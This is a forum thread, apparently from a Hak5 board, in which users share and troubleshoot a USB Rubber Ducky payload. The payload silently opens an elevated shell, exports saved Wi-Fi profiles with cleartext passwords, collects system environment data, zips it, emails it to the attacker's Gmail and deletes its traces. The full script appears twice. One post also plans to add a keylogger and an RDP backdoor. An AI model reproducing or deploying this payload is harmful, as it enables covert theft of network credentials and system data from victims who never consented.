Jump to content

[Payload] Wifi Profiles & computer info emailed to gmail


Zeta
 Share

Recommended Posts

Hello fellow Hak5 fans!!! I recently have just written my first USB Rubber Ducky Payload and thought I would share it.

If you spot any errors/improvements let me know :smile:.

REM Author: Zeta

REM Date: 4/5/15
REM Description: This program collects the computer info and wifi passwords of the victim and emails it to attackers gmail.
REM------------------------OPEN & HIDE------------------------
DELAY 750
GUI r
DELAY 400
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 555
ALT y
DELAY 555
ENTER
ENTER
ALT SPACE
STRING M
DOWNARROW
REPEAT 111
ENTER
REM ----------------------COLLECT & DUMP----------------------
STRING set TEMPDIR=%systemdrive%\de-temp
ENTER
STRING mkdir %TEMPDIR%
ENTER
STRING cd %TEMPDIR%
ENTER
STRING netsh wlan export profile key=clear
ENTER
STRING set > info.txt
ENTER
STRING cd..
ENTER
REM ---------------------------------------------ZIPPING FILE---------------------------------------------
DELAY 450
STRING echo Set objArgs = WScript.Arguments > _zipIt.vbs
ENTER
STRING echo InputFolder = objArgs(0) >> _zipIt.vbs
ENTER
STRING echo ZipFile = objArgs(1) >> _zipIt.vbs
ENTER
STRING echo CreateObject("Scripting.FileSystemObject").CreateTextFile(ZipFile, True).Write "PK" ^& Chr(5) ^& Chr(6) ^& String(18, vbNullChar) >> _zipIt.vbs
ENTER
STRING echo Set objShell = CreateObject("Shell.Application") >> _zipIt.vbs
ENTER
STRING echo Set source = objShell.NameSpace(InputFolder).Items >> _zipIt.vbs
ENTER
STRING echo objShell.NameSpace(ZipFile).CopyHere(source) >> _zipIt.vbs
ENTER
STRING echo wScript.Sleep 2000 >> _zipIt.vbs
ENTER
STRING CScript _zipIt.vbs %TEMPDIR% %systemdrive%\de-temp.zip
ENTER
DELAY 200
REM -----------------------------------EMAIL LOG VIA GMAIL-----------------------------------
STRING powershell -command $SMTPServer = 'smtp.gmail.com'; $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('USERNAME', 'PASSWORD'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'EMAIL'; $ReportEmail.To.Add('EMAIL'); $ReportEmail.Attachments.Add('%systemdrive%\de-temp.zip'); $ReportEmail.Subject = '%computername%'; $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 100
REM ---------------------DELETE AND END---------------------
STRING RD /S /Q "%systemdrive%\de-temp"
ENTER
STRING TYPE nul > %systemdrive%\de-temp.zip
ENTER
STRING DEL /Q %systemdrive%\de-temp.zip
ENTER
STRING TYPE nul > %systemdrive%\_zipIt.vbs
ENTER
STRING DEL /Q %systemdrive%\_zipIt.vbs
ENTER
STRING exit
ENTER
Link to comment
Share on other sites

Thanks :)!!! I definitely will, I plan on adding a whole bunch of stuff. My goals

#1. reconnaissance (this code plus maybe IP address info)

#2. download and implement keylogger

#3. Backdoor (probably enabling RDP since network access is already granted)

Link to comment
Share on other sites

  • 2 months later...

Is this great looking Payload still working? i ran it and it gets hung on UA and then sending me a email. Reds out during writing heres what i have.

REM Author: Zeta
REM Date: 4/5/15
REM Description: This program collects the computer info and wifi passwords of the victim and emails it to attackers gmail.
REM------------------------OPEN & HIDE------------------------
DELAY 750
GUI r
DELAY 400
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 555
ALT y
DELAY 555
ENTER
ENTER
ALT SPACE
STRING M
DOWNARROW
REPEAT 111
ENTER
REM ----------------------COLLECT & DUMP----------------------
STRING set TEMPDIR=%systemdrive%\de-temp
ENTER
STRING mkdir %TEMPDIR%
ENTER
STRING cd %TEMPDIR%
ENTER
STRING netsh wlan export profile key=clear
ENTER
STRING set > info.txt
ENTER
STRING cd..
ENTER
REM ---------------------------------------------ZIPPING FILE---------------------------------------------
DELAY 450
STRING echo Set objArgs = WScript.Arguments > _zipIt.vbs
ENTER
STRING echo InputFolder = objArgs(0) >> _zipIt.vbs
ENTER
STRING echo ZipFile = objArgs(1) >> _zipIt.vbs
ENTER
STRING echo CreateObject("Scripting.FileSystemObject").CreateTextFile(ZipFile, True).Write "PK" ^& Chr(5) ^& Chr(6) ^& String(18, vbNullChar) >> _zipIt.vbs
ENTER
STRING echo Set objShell = CreateObject("Shell.Application") >> _zipIt.vbs
ENTER
STRING echo Set source = objShell.NameSpace(InputFolder).Items >> _zipIt.vbs
ENTER
STRING echo objShell.NameSpace(ZipFile).CopyHere(source) >> _zipIt.vbs
ENTER
STRING echo wScript.Sleep 2000 >> _zipIt.vbs
ENTER
STRING CScript _zipIt.vbs %TEMPDIR% %systemdrive%\de-temp.zip
ENTER
DELAY 200
REM -----------------------------------EMAIL LOG VIA GMAIL-----------------------------------
STRING powershell.exe -command $SMTPServer = 'smtp.gmail.com'; $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('ishineblue', 'PWHERE'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'ishineblue@gmail.com'; $ReportEmail.To.Add('ishineblue@gmail.com'); $ReportEmail.Attachments.Add('%systemdrive%\de-temp.zip'); $ReportEmail.Subject = '%computername%'; $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 100
REM ---------------------DELETE AND END---------------------
STRING RD /S /Q "%systemdrive%\de-temp"
ENTER
STRING TYPE nul > %systemdrive%\de-temp.zip
ENTER
STRING DEL /Q %systemdrive%\de-temp.zip
ENTER
STRING TYPE nul > %systemdrive%\_zipIt.vbs
ENTER
STRING DEL /Q %systemdrive%\_zipIt.vbs
ENTER
STRING exit
ENTER

Edited by Bluediamond
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...